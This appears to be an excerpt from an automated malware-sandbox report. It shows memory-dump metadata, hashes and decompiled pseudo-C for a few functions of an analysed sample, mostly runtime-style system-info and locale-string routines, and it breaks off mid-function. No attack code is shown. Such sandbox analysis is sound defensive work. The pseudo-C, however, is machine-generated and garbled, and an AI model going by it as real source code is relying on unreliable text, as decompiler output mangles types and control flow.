                          0x0130c735
                          0x0130c740
                          0x0130c747
                          0x0130c751
                          0x0130c75b
                          0x0130c765
                          0x0130c76f
                          0x0130c777
                          0x0130c77f
                          0x0130c787
                          0x0130c78f
                          0x0130c799
                          0x0130c7a2
                          0x0130c7b0

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_taskEnvironmentVariable
                          • String ID: J
                          • API String ID: 2182311312-1141589763
                          • Opcode ID: 26bc2e0ccc329309093b5ef0eb6b3311148eef362e50c9c8010e4a11f0d72e85
                          • Instruction ID: 9511f41efbd28b14a215d4fb2ce4fe0e4df55f7377dec9706b5a0e00492caff6
                          • Opcode Fuzzy Hash: 26bc2e0ccc329309093b5ef0eb6b3311148eef362e50c9c8010e4a11f0d72e85
                          • Instruction Fuzzy Hash: ECF29E70910258CFEB15DF28DC54BAEBBB5FF51308F9081D8D409AB2A1DB759A88CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 21%
                          			E0130A220() {
                          				signed int _v8;
                          				void* _v24;
                          				struct _SYSTEM_INFO _v44;
                          				signed int _t6;
                          				void* _t14;
                          				signed int _t15;
                          
                          				_t6 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t6 ^ _t15;
                          				asm("xorps xmm0, xmm0");
                          				_v44.wProcessorLevel = 0;
                          				asm("movups [ebp-0x28], xmm0");
                          				asm("movups [ebp-0x18], xmm0"); // executed
                          				GetSystemInfo( &_v44); // executed
                          				return E0132EA79(_v8 ^ _t15, _t14);
                          			}










                          APIs
                          • GetSystemInfo.KERNELBASE(?), ref: 0130A246
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: InfoSystem
                          • String ID:
                          • API String ID: 31276548-0
                          • Opcode ID: 839dc4168eb291d7d8ed0ce0b8cde7d0898c5b6101a5981a45d01a4dd3e01f6d
                          • Instruction ID: da797f5ea6a452ff485292632bcea5b3bd7f0a34b5595d335b4d79be18f8bdd3
                          • Opcode Fuzzy Hash: 839dc4168eb291d7d8ed0ce0b8cde7d0898c5b6101a5981a45d01a4dd3e01f6d
                          • Instruction Fuzzy Hash: 2AE01231D1420DDBDB10DFE5D5816EEFBB8AF5D304F51525AD804B3240EB706AD49791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E0134A5EB(void* __ebx, void* __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				intOrPtr _v40;
                          				char _v44;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _t264;
                          				intOrPtr _t266;
                          				void* _t270;
                          				intOrPtr _t274;
                          				void* _t278;
                          				intOrPtr _t280;
                          				void* _t284;
                          				intOrPtr _t286;
                          				void* _t290;
                          				intOrPtr _t292;
                          				void* _t296;
                          				intOrPtr _t298;
                          				intOrPtr _t300;
                          				intOrPtr _t302;
                          				intOrPtr _t303;
                          				intOrPtr _t305;
                          				void* _t312;
                          				intOrPtr _t313;
                          				intOrPtr _t315;
                          				void* _t322;
                          				intOrPtr _t323;
                          				intOrPtr _t325;
                          				void* _t332;
                          				intOrPtr _t333;
                          				intOrPtr _t335;
                          				void* _t342;
                          				intOrPtr _t343;
                          				intOrPtr _t345;
                          				void* _t352;
                          				intOrPtr _t354;
                          				intOrPtr _t356;
                          				intOrPtr _t358;
                          				intOrPtr _t360;
                          				intOrPtr _t362;
                          				void* _t370;
                          				void* _t377;
                          				void* _t384;
                          				void* _t391;
                          				void* _t397;
                          				void* _t401;
                          				void* _t405;
                          				intOrPtr* _t407;
                          				intOrPtr* _t409;
                          				intOrPtr* _t411;
                          				intOrPtr* _t413;
                          				intOrPtr* _t415;
                          				intOrPtr _t416;
                          				unsigned int _t418;
                          				unsigned int _t425;
                          				unsigned int _t427;
                          				unsigned int _t429;
                          				intOrPtr* _t432;
                          				intOrPtr* _t433;
                          				intOrPtr* _t436;
                          				intOrPtr* _t440;
                          				intOrPtr* _t444;
                          				intOrPtr* _t448;
                          				intOrPtr* _t452;
                          				intOrPtr* _t454;
                          				intOrPtr* _t456;
                          				void* _t457;
                          				intOrPtr _t458;
                          				intOrPtr* _t459;
                          				intOrPtr* _t463;
                          				intOrPtr* _t468;
                          				intOrPtr* _t473;
                          				intOrPtr* _t478;
                          				intOrPtr* _t483;
                          				intOrPtr* _t486;
                          				intOrPtr* _t489;
                          				intOrPtr* _t492;
                          				intOrPtr _t505;
                          				intOrPtr _t506;
                          				void* _t507;
                          				void* _t508;
                          				void* _t509;
                          				intOrPtr _t512;
                          				long _t515;
                          				void* _t522;
                          				void* _t524;
                          				intOrPtr* _t526;
                          				intOrPtr* _t528;
                          				intOrPtr* _t530;
                          				intOrPtr* _t532;
                          				intOrPtr* _t534;
                          				intOrPtr _t535;
                          				void* _t540;
                          
                          				_t512 = 0;
                          				E01349944( &_v44, __edx, 0);
                          				_t515 = 0x164;
                          				_v20 = 0;
                          				_t505 = 0;
                          				_v12 = 0;
                          				_t432 =  *((intOrPtr*)(_v40 + 0x9c));
                          				_t264 = 0;
                          				_v8 = _t432;
                          				_v16 = 0;
                          				L2:
                          				while(1) {
                          					L2:
                          					if(_t505 != 1) {
                          						L5:
                          						_t506 = _t512;
                          						_v24 = _t264;
                          						_v24 = _v24 - _t432;
                          						_t407 = _t432;
                          						_v28 = _t506;
                          						do {
                          							if(_v12 != 1) {
                          								L9:
                          								_t433 =  *_t407;
                          								_v28 = _t433 + 1;
                          								do {
                          									_t266 =  *_t433;
                          									_t433 = _t433 + 1;
                          								} while (_t266 != 0);
                          								goto L11;
                          							} else {
                          								 *((intOrPtr*)(_v24 + _t407)) = _t264 + _t515;
                          								_t270 = E01355567(_t264 + _t515, _v20 - _t515,  *_t407);
                          								_t540 = _t540 + 0xc;
                          								if(_t270 != 0) {
                          									L128:
                          									_push(_t512);
                          									_push(_t512);
                          									_push(_t512);
                          									_push(_t512);
                          									_push(_t512);
                          									E013496E7();
                          									asm("int3");
                          									return E01352697(_t506, _v72, _v68, _v64, _v60, _v56, 0);
                          								} else {
                          									_t506 = _v28;
                          									goto L9;
                          								}
                          							}
                          							goto L129;
                          							L11:
                          							_t264 = _v16;
                          							_t515 = _t515 + 1 + _t433 - _v28;
                          							_t506 = _t506 + 1;
                          							_t407 = _t407 + 4;
                          							_v28 = _t506;
                          						} while (_t506 < 7);
                          						_t506 = _t512;
                          						_v28 = _t506;
                          						_t409 = _v8 + 0x1c;
                          						do {
                          							if(_v12 != 1) {
                          								L16:
                          								_t436 =  *_t409;
                          								_v28 = _t436 + 1;
                          								do {
                          									_t274 =  *_t436;
                          									_t436 = _t436 + 1;
                          								} while (_t274 != 0);
                          								goto L18;
                          							} else {
                          								 *((intOrPtr*)(_t409 + _v24)) = _v16 + _t515;
                          								_t278 = E01355567(_v16 + _t515, _v20 - _t515,  *_t409);
                          								_t540 = _t540 + 0xc;
                          								if(_t278 != 0) {
                          									goto L128;
                          								} else {
                          									_t506 = _v28;
                          									goto L16;
                          								}
                          							}
                          							goto L129;
                          							L18:
                          							_t515 = _t515 + 1 + _t436 - _v28;
                          							_t409 = _t409 + 4;
                          							_t506 = _t506 + 1;
                          							_v28 = _t506;
                          						} while (_t506 < 7);
                          						_t506 = _t512;
                          						_v28 = _t506;
                          						_t411 = _v8 + 0x38;
                          						do {
                          							if(_v12 != 1) {
                          								L23:
                          								_t440 =  *_t411;
                          								_v28 = _t440 + 1;
                          								do {
                          									_t280 =  *_t440;
                          									_t440 = _t440 + 1;
                          								} while (_t280 != 0);
                          								goto L25;
                          							} else {
                          								 *((intOrPtr*)(_t411 + _v24)) = _v16 + _t515;
                          								_t284 = E01355567(_v16 + _t515, _v20 - _t515,  *_t411);
                          								_t540 = _t540 + 0xc;
                          								if(_t284 != 0) {
                          									goto L128;
                          								} else {
                          									_t506 = _v28;
                          									goto L23;
                          								}
                          							}
                          							goto L129;
                          							L25:
                          							_t515 = _t515 + 1 + _t440 - _v28;
                          							_t411 = _t411 + 4;
                          							_t506 = _t506 + 1;
                          							_v28 = _t506;
                          						} while (_t506 < 0xc);
                          						_t506 = _t512;
                          						_v28 = _t506;
                          						_t413 = _v8 + 0x68;
                          						do {
                          							if(_v12 != 1) {
                          								L30:
                          								_t444 =  *_t413;
                          								_v28 = _t444 + 1;
                          								do {
                          									_t286 =  *_t444;
                          									_t444 = _t444 + 1;
                          								} while (_t286 != 0);
                          								goto L32;
                          							} else {
                          								 *((intOrPtr*)(_t413 + _v24)) = _v16 + _t515;
                          								_t290 = E01355567(_v16 + _t515, _v20 - _t515,  *_t413);
                          								_t540 = _t540 + 0xc;
                          								if(_t290 != 0) {
                          									goto L128;
                          								} else {
                          									_t506 = _v28;
                          									goto L30;
                          								}
                          							}
                          							goto L129;
                          							L32:
                          							_t515 = _t515 + 1 + _t444 - _v28;
                          							_t413 = _t413 + 4;
                          							_t506 = _t506 + 1;
                          							_v28 = _t506;
                          						} while (_t506 < 0xc);
                          						_t506 = _t512;
                          						_v28 = _t506;
                          						_t415 = _v8 + 0x98;
                          						do {
                          							if(_v12 != 1) {
                          								L37:
                          								_t448 =  *_t415;
                          								_v28 = _t448 + 1;
                          								do {
                          									_t292 =  *_t448;
                          									_t448 = _t448 + 1;
                          								} while (_t292 != 0);
                          								goto L39;
                          							} else {
                          								 *((intOrPtr*)(_t415 + _v24)) = _v16 + _t515;
                          								_t296 = E01355567(_v16 + _t515, _v20 - _t515,  *_t415);
                          								_t540 = _t540 + 0xc;
                          								if(_t296 != 0) {
                          									goto L128;
                          								} else {
                          									_t506 = _v28;
                          									goto L37;
                          								}
                          							}
                          							goto L129;
                          							L39:
                          							_t515 = _t515 + 1 + _t448 - _v28;
                          							_t415 = _t415 + 4;
                          							_t506 = _t506 + 1;
                          							_v28 = _t506;
                          						} while (_t506 < 2);
                          						_t416 = _v16;
                          						if(_v12 != 1) {
                          							L42:
                          							_t452 =  *((intOrPtr*)(_v8 + 0xa0));
                          							_t506 = _t452 + 1;
                          							do {
                          								_t298 =  *_t452;
                          								_t452 = _t452 + 1;
                          							} while (_t298 != 0);
                          							_t522 = _t515 + 1 + _t452 - _t506;
                          							if(_v12 != 1) {
                          								L46:
                          								_t454 =  *((intOrPtr*)(_v8 + 0xa4));
                          								_t93 = _t454 + 1; // 0x1
                          								_t506 = _t93;
                          								do {
                          									_t300 =  *_t454;
                          									_t454 = _t454 + 1;
                          								} while (_t300 != 0);
                          								_t524 = _t522 + 1 + _t454 - _t506;
                          								if(_v12 != 1) {
                          									L50:
                          									_t456 =  *((intOrPtr*)(_v8 + 0xa8));
                          									_t102 = _t456 + 1; // 0x132afa0
                          									_t507 = _t102;
                          									do {
                          										_t302 =  *_t456;
                          										_t456 = _t456 + 1;
                          									} while (_t302 != 0);
                          									_t457 = _t456 - _t507;
                          									_t506 = _v12;
                          									_t104 = _t457 + 1; // 0x132afa1
                          									_t458 = _v16;
                          									_t418 = _t104 + _t524;
                          									if(_t506 == 1) {
                          										 *((intOrPtr*)(_t458 + 0xac)) =  *((intOrPtr*)(_v8 + 0xac));
                          										 *((intOrPtr*)(_t458 + 0xb0)) = _t512;
                          									}
                          									_v28 = _t512;
                          									_t526 = _v8 + 0xb4;
                          									L56:
                          									while((_t418 & 0x00000001) == 0) {
                          										if(_t506 != 1) {
                          											L59:
                          											_t459 =  *_t526;
                          											_t508 = _t459 + 2;
                          											do {
                          												_t303 =  *_t459;
                          												_t459 = _t459 + 2;
                          											} while (_t303 != _t512);
                          											_t506 = _v12;
                          											_t526 = _t526 + 4;
                          											_t458 = _v16;
                          											_t418 = _t418 + (_t459 - _t508 >> 1) * 2 + 2;
                          											_t305 = _v28 + 1;
                          											_v28 = _t305;
                          											if(_t305 < 7) {
                          												continue;
                          											} else {
                          												_v28 = _t512;
                          												_t528 = _v8 + 0xd0;
                          												L64:
                          												while((_t418 & 0x00000001) == 0) {
                          													if(_v12 != 1) {
                          														L67:
                          														_t463 =  *_t528;
                          														_t506 = _t463 + 2;
                          														do {
                          															_t313 =  *_t463;
                          															_t463 = _t463 + 2;
                          														} while (_t313 != _t512);
                          														_t528 = _t528 + 4;
                          														_t418 = _t418 + (_t463 - _t506 >> 1) * 2 + 2;
                          														_t315 = _v28 + 1;
                          														_v28 = _t315;
                          														if(_t315 < 7) {
                          															continue;
                          														} else {
                          															_v28 = _t512;
                          															_t530 = _v8 + 0xec;
                          															L72:
                          															while((_t418 & 0x00000001) == 0) {
                          																if(_v12 != 1) {
                          																	L75:
                          																	_t468 =  *_t530;
                          																	_t506 = _t468 + 2;
                          																	do {
                          																		_t323 =  *_t468;
                          																		_t468 = _t468 + 2;
                          																	} while (_t323 != _t512);
                          																	_t530 = _t530 + 4;
                          																	_t418 = _t418 + (_t468 - _t506 >> 1) * 2 + 2;
                          																	_t325 = _v28 + 1;
                          																	_v28 = _t325;
                          																	if(_t325 < 0xc) {
                          																		continue;
                          																	} else {
                          																		_v28 = _t512;
                          																		_t532 = _v8 + 0x11c;
                          																		L80:
                          																		while((_t418 & 0x00000001) == 0) {
                          																			if(_v12 != 1) {
                          																				L83:
                          																				_t473 =  *_t532;
                          																				_t506 = _t473 + 2;
                          																				do {
                          																					_t333 =  *_t473;
                          																					_t473 = _t473 + 2;
                          																				} while (_t333 != _t512);
                          																				_t532 = _t532 + 4;
                          																				_t418 = _t418 + (_t473 - _t506 >> 1) * 2 + 2;
                          																				_t335 = _v28 + 1;
                          																				_v28 = _t335;
                          																				if(_t335 < 0xc) {
                          																					continue;
                          																				} else {
                          																					_v28 = _t512;
                          																					_t534 = _v8 + 0x14c;
                          																					L88:
                          																					while((_t418 & 0x00000001) == 0) {
                          																						if(_v12 != 1) {
                          																							L91:
                          																							_t478 =  *_t534;
                          																							_t506 = _t478 + 2;
                          																							do {
                          																								_t343 =  *_t478;
                          																								_t478 = _t478 + 2;
                          																							} while (_t343 != _t512);
                          																							_t534 = _t534 + 4;
                          																							_t418 = _t418 + (_t478 - _t506 >> 1) * 2 + 2;
                          																							_t345 = _v28 + 1;
                          																							_v28 = _t345;
                          																							if(_t345 < 2) {
                          																								continue;
                          																							} else {
                          																								while((_t418 & 0x00000001) != 0) {
                          																									_t418 = _t418 + 1;
                          																								}
                          																								_t535 = _v16;
                          																								if(_v12 != 1) {
                          																									L99:
                          																									_t483 =  *((intOrPtr*)(_v8 + 0x154));
                          																									_t506 = _t483 + 2;
                          																									do {
                          																										_t354 =  *_t483;
                          																										_t483 = _t483 + 2;
                          																									} while (_t354 != _t512);
                          																									_t425 = _t418 + (_t483 - _t506 >> 1) * 2 + 2;
                          																									while((_t425 & 0x00000001) != 0) {
                          																										_t425 = _t425 + 1;
                          																									}
                          																									if(_v12 != 1) {
                          																										L106:
                          																										_t486 =  *((intOrPtr*)(_v8 + 0x158));
                          																										_t506 = _t486 + 2;
                          																										do {
                          																											_t356 =  *_t486;
                          																											_t486 = _t486 + 2;
                          																										} while (_t356 != _t512);
                          																										_t427 = _t425 + (_t486 - _t506 >> 1) * 2 + 2;
                          																										while((_t427 & 0x00000001) != 0) {
                          																											_t427 = _t427 + 1;
                          																										}
                          																										if(_v12 != 1) {
                          																											L113:
                          																											_t489 =  *((intOrPtr*)(_v8 + 0x15c));
                          																											_t506 = _t489 + 2;
                          																											do {
                          																												_t358 =  *_t489;
                          																												_t489 = _t489 + 2;
                          																											} while (_t358 != _t512);
                          																											_t429 = _t427 + (_t489 - _t506 >> 1) * 2 + 2;
                          																											while((_t429 & 0x00000001) != 0) {
                          																												_t429 = _t429 + 1;
                          																											}
                          																											if(_v12 != 1) {
                          																												L120:
                          																												_t492 =  *((intOrPtr*)(_v8 + 0x160));
                          																												_t509 = _t492 + 2;
                          																												do {
                          																													_t360 =  *_t492;
                          																													_t492 = _t492 + 2;
                          																												} while (_t360 != _t512);
                          																												_t505 = _v12 + 1;
                          																												_v12 = _t505;
                          																												_t515 = _t429 + ((_t492 - _t509 >> 1) + 1) * 2;
                          																												if(_t505 >= 2) {
                          																													_t512 = _v16;
                          																													goto L125;
                          																												} else {
                          																													_t264 = _v16;
                          																													_t432 = _v8;
                          																													goto L2;
                          																												}
                          																											} else {
                          																												 *((intOrPtr*)(_t535 + 0x160)) = _t535 + (_t429 >> 1) * 2;
                          																												_t370 = E01352808(_t535 + (_t429 >> 1) * 2, _v20 - _t429 >> 1,  *((intOrPtr*)(_v8 + 0x160)));
                          																												_t540 = _t540 + 0xc;
                          																												if(_t370 != 0) {
                          																													goto L128;
                          																												} else {
                          																													goto L120;
                          																												}
                          																											}
                          																										} else {
                          																											 *((intOrPtr*)(_t535 + 0x15c)) = _t535 + (_t427 >> 1) * 2;
                          																											_t377 = E01352808(_t535 + (_t427 >> 1) * 2, _v20 - _t427 >> 1,  *((intOrPtr*)(_v8 + 0x15c)));
                          																											_t540 = _t540 + 0xc;
                          																											if(_t377 != 0) {
                          																												goto L128;
                          																											} else {
                          																												goto L113;
                          																											}
                          																										}
                          																									} else {
                          																										 *((intOrPtr*)(_t535 + 0x158)) = _t535 + (_t425 >> 1) * 2;
                          																										_t384 = E01352808(_t535 + (_t425 >> 1) * 2, _v20 - _t425 >> 1,  *((intOrPtr*)(_v8 + 0x158)));
                          																										_t540 = _t540 + 0xc;
                          																										if(_t384 != 0) {
                          																											goto L128;
                          																										} else {
                          																											goto L106;
                          																										}
                          																									}
                          																								} else {
                          																									 *((intOrPtr*)(_t535 + 0x154)) = _t535 + (_t418 >> 1) * 2;
                          																									_t391 = E01352808(_t535 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *((intOrPtr*)(_v8 + 0x154)));
                          																									_t540 = _t540 + 0xc;
                          																									if(_t391 != 0) {
                          																										goto L128;
                          																									} else {
                          																										goto L99;
                          																									}
                          																								}
                          																							}
                          																						} else {
                          																							 *((intOrPtr*)(_t534 + _v24)) = _v16 + (_t418 >> 1) * 2;
                          																							_t352 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t534);
                          																							_t540 = _t540 + 0xc;
                          																							if(_t352 != 0) {
                          																								goto L128;
                          																							} else {
                          																								goto L91;
                          																							}
                          																						}
                          																						goto L129;
                          																					}
                          																					_t418 = _t418 + 1;
                          																					goto L88;
                          																				}
                          																			} else {
                          																				 *((intOrPtr*)(_t532 + _v24)) = _v16 + (_t418 >> 1) * 2;
                          																				_t342 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t532);
                          																				_t540 = _t540 + 0xc;
                          																				if(_t342 != 0) {
                          																					goto L128;
                          																				} else {
                          																					goto L83;
                          																				}
                          																			}
                          																			goto L129;
                          																		}
                          																		_t418 = _t418 + 1;
                          																		goto L80;
                          																	}
                          																} else {
                          																	 *((intOrPtr*)(_t530 + _v24)) = _v16 + (_t418 >> 1) * 2;
                          																	_t332 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t530);
                          																	_t540 = _t540 + 0xc;
                          																	if(_t332 != 0) {
                          																		goto L128;
                          																	} else {
                          																		goto L75;
                          																	}
                          																}
                          																goto L129;
                          															}
                          															_t418 = _t418 + 1;
                          															goto L72;
                          														}
                          													} else {
                          														 *((intOrPtr*)(_t528 + _v24)) = _v16 + (_t418 >> 1) * 2;
                          														_t322 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t528);
                          														_t540 = _t540 + 0xc;
                          														if(_t322 != 0) {
                          															goto L128;
                          														} else {
                          															goto L67;
                          														}
                          													}
                          													goto L129;
                          												}
                          												_t418 = _t418 + 1;
                          												goto L64;
                          											}
                          										} else {
                          											 *((intOrPtr*)(_t526 + _v24)) = _t458 + (_t418 >> 1) * 2;
                          											_t312 = E01352808(_t458 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t526);
                          											_t540 = _t540 + 0xc;
                          											if(_t312 != 0) {
                          												goto L128;
                          											} else {
                          												goto L59;
                          											}
                          										}
                          										goto L129;
                          									}
                          									_t418 = _t418 + 1;
                          									goto L56;
                          								} else {
                          									 *((intOrPtr*)(_t416 + 0xa8)) = _t416 + _t524;
                          									_t397 = E01355567(_t416 + _t524, _v20 - _t524,  *((intOrPtr*)(_v8 + 0xa8)));
                          									_t540 = _t540 + 0xc;
                          									if(_t397 != 0) {
                          										goto L128;
                          									} else {
                          										goto L50;
                          									}
                          								}
                          							} else {
                          								 *((intOrPtr*)(_t416 + 0xa4)) = _t416 + _t522;
                          								_t401 = E01355567(_t416 + _t522, _v20 - _t522,  *((intOrPtr*)(_v8 + 0xa4)));
                          								_t540 = _t540 + 0xc;
                          								if(_t401 != 0) {
                          									goto L128;
                          								} else {
                          									goto L46;
                          								}
                          							}
                          						} else {
                          							 *((intOrPtr*)(_t416 + 0xa0)) = _t416 + _t515;
                          							_t405 = E01355567(_t416 + _t515, _v20 - _t515,  *((intOrPtr*)(_v8 + 0xa0)));
                          							_t540 = _t540 + 0xc;
                          							if(_t405 != 0) {
                          								goto L128;
                          							} else {
                          								goto L42;
                          							}
                          						}
                          					} else {
                          						_t362 = E013576ED(_t515); // executed
                          						_v16 = _t362;
                          						if(_t362 == 0) {
                          							L125:
                          							if(_v32 != 0) {
                          								 *(_v44 + 0x350) =  *(_v44 + 0x350) & 0xfffffffd;
                          							}
                          							return _t512;
                          						} else {
                          							E013478D0(_t512, _t362, _t512, _t515);
                          							_t264 = _v16;
                          							_t540 = _t540 + 0xc;
                          							_t432 = _v8;
                          							_v20 = _t515;
                          							_t515 = 0x164;
                          							goto L5;
                          						}
                          					}
                          					L129:
                          				}
                          			}


                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: df1e006896783462e176ce9dab9edfdf4b57364b05705571f3288edf14f9e6f4
                          • Instruction ID: 90543903a46cc856db8144a182bd1f9e8c1e98aafd27d4cc0c99898aa5a93725
                          • Opcode Fuzzy Hash: df1e006896783462e176ce9dab9edfdf4b57364b05705571f3288edf14f9e6f4
                          • Instruction Fuzzy Hash: A1327A74A0020ADFCF59CF9CC994EBFBBB5EF44608F184168DD45A7306D632AA46CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (graph not preserved; legend: Executed / Not Executed)
                          C-Code - Quality: 76%
                          			E013543F7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                          				intOrPtr* _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v40;
                          				signed int _v44;
                          				intOrPtr _v48;
                          				signed int _v60;
                          				char _v276;
                          				short _v278;
                          				short _v280;
                          				char _v448;
                          				signed int _v452;
                          				short _v454;
                          				intOrPtr _v456;
                          				signed int _v460;
                          				intOrPtr _v464;
                          				signed int _v468;
                          				signed int _v472;
                          				intOrPtr _v512;
                          				char _v536;
                          				intOrPtr _v540;
                          				signed int _v544;
                          				intOrPtr _v548;
                          				signed int _v560;
                          				char _v708;
                          				signed int _v712;
                          				short _v714;
                          				signed int _v716;
                          				signed int _v720;
                          				signed int _v724;
                          				intOrPtr _v728;
                          				signed int _v732;
                          				intOrPtr _v736;
                          				signed int* _v740;
                          				signed int _v744;
                          				signed int _v748;
                          				signed int _v752;
                          				char _v824;
                          				char _v1252;
                          				char _v1268;
                          				intOrPtr _v1284;
                          				signed int _v1288;
                          				intOrPtr _v1324;
                          				signed int _v1336;
                          				void* __ebp;
                          				signed int _t249;
                          				signed int _t251;
                          				void* _t254;
                          				signed int _t257;
                          				signed int _t259;
                          				signed int _t266;
                          				signed int _t267;
                          				signed int _t268;
                          				signed int _t269;
                          				signed int _t270;
                          				signed int _t272;
                          				signed int _t274;
                          				void* _t276;
                          				signed int _t277;
                          				signed int _t278;
                          				signed int _t279;
                          				signed int _t281;
                          				signed int _t284;
                          				signed int _t291;
                          				signed int _t294;
                          				signed int _t295;
                          				intOrPtr _t296;
                          				signed int _t299;
                          				signed int _t301;
                          				signed int _t302;
                          				signed int _t305;
                          				signed int _t307;
                          				signed int _t310;
                          				signed int _t311;
                          				signed int _t313;
                          				signed int _t331;
                          				signed int _t333;
                          				signed int _t335;
                          				signed int _t339;
                          				void* _t341;
                          				signed int _t343;
                          				void* _t344;
                          				intOrPtr _t345;
                          				signed int _t350;
                          				signed int _t351;
                          				intOrPtr* _t356;
                          				signed int _t370;
                          				signed int _t372;
                          				signed int _t374;
                          				intOrPtr* _t375;
                          				signed int _t377;
                          				void* _t382;
                          				intOrPtr* _t387;
                          				intOrPtr* _t390;
                          				void* _t393;
                          				signed int _t394;
                          				intOrPtr* _t397;
                          				intOrPtr* _t398;
                          				char* _t405;
                          				intOrPtr _t409;
                          				intOrPtr* _t410;
                          				signed int _t412;
                          				signed int _t417;
                          				signed int _t418;
                          				intOrPtr* _t422;
                          				intOrPtr* _t423;
                          				signed int _t432;
                          				short _t433;
                          				void* _t434;
                          				void* _t436;
                          				signed int _t437;
                          				signed int _t439;
                          				intOrPtr _t440;
                          				signed int _t443;
                          				intOrPtr _t444;
                          				signed int _t446;
                          				signed int _t449;
                          				intOrPtr _t455;
                          				signed int _t456;
                          				void* _t457;
                          				signed int _t458;
                          				signed int _t459;
                          				void* _t461;
                          				signed int _t463;
                          				signed int _t465;
                          				signed int _t468;
                          				signed int* _t469;
                          				short _t470;
                          				signed int _t472;
                          				signed int _t473;
                          				void* _t475;
                          				void* _t476;
                          				signed int _t477;
                          				void* _t478;
                          				void* _t479;
                          				signed int _t480;
                          				void* _t482;
                          				void* _t483;
                          				signed int _t495;
                          
                          				_t431 = __edx;
                          				_push(__ebx);
                          				_push(__esi);
                          				_v12 = 1;
                          				_t249 = E013576ED(0x6a6); // executed
                          				_t370 = _t249;
                          				_t250 = 0;
                          				_pop(_t382);
                          				if(_t370 == 0) {
                          					L20:
                          					return _t250;
                          				} else {
                          					_push(__edi);
                          					 *_t370 = 1;
                          					_t439 = _t370 + 4;
                          					_t455 = _a4;
                          					 *_t439 = 0;
                          					_t251 = _t455 + 0x30;
                          					_push( *_t251);
                          					_v16 = _t251;
                          					_push(0x137c338);
                          					_push( *0x137c274);
                          					E01354333(_t370, _t382, __edx, _t439, _t455, _t439, 0x351, 3);
                          					_t476 = _t475 + 0x18;
                          					_v8 = 0x137c274;
                          					while(1) {
                          						L2:
                          						_t254 = E0135C7FD(_t439, 0x351, 0x137c334);
                          						_t477 = _t476 + 0xc;
                          						if(_t254 != 0) {
                          							break;
                          						} else {
                          							_t8 = _v16 + 0x10; // 0x10
                          							_t422 = _t8;
                          							_t350 =  *_v16;
                          							_v16 = _t422;
                          							_t423 =  *_t422;
                          							_v20 = _t423;
                          							goto L4;
                          						}
                          						while(1) {
                          							L4:
                          							_t431 =  *_t350;
                          							if(_t431 !=  *_t423) {
                          								break;
                          							}
                          							if(_t431 == 0) {
                          								L8:
                          								_t351 = 0;
                          							} else {
                          								_t431 =  *((intOrPtr*)(_t350 + 2));
                          								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
                          									break;
                          								} else {
                          									_t350 = _t350 + 4;
                          									_t423 = _t423 + 4;
                          									if(_t431 != 0) {
                          										continue;
                          									} else {
                          										goto L8;
                          									}
                          								}
                          							}
